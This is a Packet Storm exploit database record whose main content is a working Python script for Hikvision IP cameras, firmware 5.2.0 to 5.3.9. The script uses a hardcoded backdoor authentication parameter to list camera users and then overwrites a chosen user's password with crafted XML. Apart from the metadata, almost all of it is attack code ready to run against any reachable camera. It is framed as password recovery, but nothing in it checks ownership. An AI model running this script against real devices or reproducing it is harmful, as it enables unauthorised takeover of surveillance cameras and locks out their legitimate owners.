DATABASE RESOURCES PRICING ABOUT US

{"id": "PACKETSTORM:146910", "vendorId": null, "type": "packetstorm", "bulletinFamily": "exploit", "title": "Hikvision IP Camera 5.3.9 Access Control Bypass", "description": "", "published": "2018-03-26T00:00:00", "modified": "2018-03-26T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://packetstormsecurity.com/files/146910/Hikvision-IP-Camera-5.3.9-Access-Control-Bypass.html", "reporter": "Matamorphosis", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2018-03-28T09:20:46", "viewCount": 121, "enchantments": {"score": {"value": 1.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "ics", "idList": ["ICSA-17-124-01"]}]}, "exploitation": null, "vulnersScore": 1.1}, "_state": {"dependencies": 1678916735, "score": 1678914494, "epss": 1678936357}, "_internal": {"score_hash": "ce5f8e1c5e2c345fead45a5c187243d2"}, "sourceHref": "https://packetstormsecurity.com/files/download/146910/hikvisionipcamera5-bypass.txt", "sourceData": "`# Exploit Title: Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109) Backdoor \n# Date: 15-03-2018 \n# Vendor Homepage: http://www.hikvision.com/en/ \n# Exploit Author: Matamorphosis \n# Category: Web Apps \n# Description: Exploits a backdoor in Hikvision camera firmware versions 5.2.0 - 5.3.9 (Builds: 140721 - 170109), deployed between 2014 and 2016, to assist the owner recover their password. \n# Vulnerability Exploited: ICSA-17-124-01 - http://seclists.org/fulldisclosure/2017/Sep/23 \n \n#!/usr/bin/env python \n# Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)] \n \nimport requests \nimport re \nimport sys \n \n# BASIC INFO \n \nnewPass = \"@Dm1N1$Tr80R\" # EXAMPLE OF A PASSWORD COMPLIANT WITH LATER FIRMWARES REQUIRING AT LEAST 2 UPPERCASE, 2 lowercase, and 2 SPECIAL CHARACTERS. \nBackdoorAuthArg = \"auth=YWRtaW46MTEK\"; # AUTHENTICATION KEY. \nip = \"\" \nport = 0 \nSSL = \"\" \nuserID = \"\" \nuserName = \"\" \n \ndef Usage(): \nprint(\"[i] Usage: python exploit.py [IP Address] [Port] [SSL (Y/N)]\") \n \ntry: \nip = sys.argv[1] \nSSL = sys.argv[3] \n \nexcept: \nprint(\"[-] One or more of the arguments is missing.\") \nUsage() \nsys.exit() \n \nipmatch = re.search(r\"\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b\", ip) # IP ADDRESS REGULAR EXPRESSION. \n \nif not ipmatch: \nprint(\"[-] The entered ip address \" + ip + \" is not in the correct format.\") \nUsage() \nsys.exit() \n \ntry: \nport = int(sys.argv[2]) \n \nexcept: \nprint(\"[-] The entered port \" + sys.argv[2] + \" is not a number.\") \nUsage() \nsys.exit() \n \nif (port == 0) or (port > 65535): \nprint(\"[-] The entered port \" + sys.argv[2] + \" is not a valid port number.\") \nUsage() \nsys.exit() \n \nif SSL == \"Y\": \nprotocol = \"https\" \n \nelse: \nprotocol = \"http\" \n \nURLBase = protocol + \"://\" + ip + \":\" + str(port) + \"/\" # URL BASE FOR FUTURE REQUESTS. \nURLDownload = URLBase + \"Security/users?\" + BackdoorAuthArg # DOWNLOAD REQUEST. \n \nprint(\"[+] Getting User List.\") \n \nDownloadResponse = requests.get(URLDownload).text \n \nfor line in DownloadResponse: # RETRIEVING USER LIST \nuseridmatch = re.search(r\"<id>(.*)<\\/id>\", line) # CHECK FOR USER ID. \nusernamematch = re.search(r\"<userName>(.*)<\\/userName>\", line) # CHECK FOR USER NAME. \n \nif useridmatch: \nuserID = useridmatch.group(1) \nprint(\"[+] User ID: \" + userID) \n \nif usernamematch: \nuserName = usernamematch.group(1) \nprint(\"[+] Username: \" + userName) \n \nuserID = raw_input(\"[?] Which User ID would you like to use? \") \nuserName = raw_input(\"[?] Which Username would you like to use? \") \n \nprint(\"[+] Using the User \" + userName + \".\") \n \nuserXML = ( '<User version=\"\"1.0\"\" xmlns=\"\"http://www.hikvision.com/ver10/XMLSchema\"\">\\r\\n<id>' + userID + '</id>\\r\\n<userName>' + userName + '</userName>\\r\\n<password>' + newPass + '</password>\\r\\n</User>' ) # OUR CRAFTED XML CONFIGURATION FILE \n \n#print(userXML) \n \nURLUpload = URLBase + \"Security/users/\" + userID + \"?\" + BackdoorAuthArg # UPLOAD REQUEST. \n \nprint(\"[+] Changing Password now.\") \n \nprint requests.put(URLUpload, data=userXML).text # UPLOAD REQUEST, SENDING THE PAYLOAD. \n \nprint(\"[+] Complete. Please try logging in with these credentials. Username: \" + userName + \"Password: \" + newPass) \n \n`\n"}

{}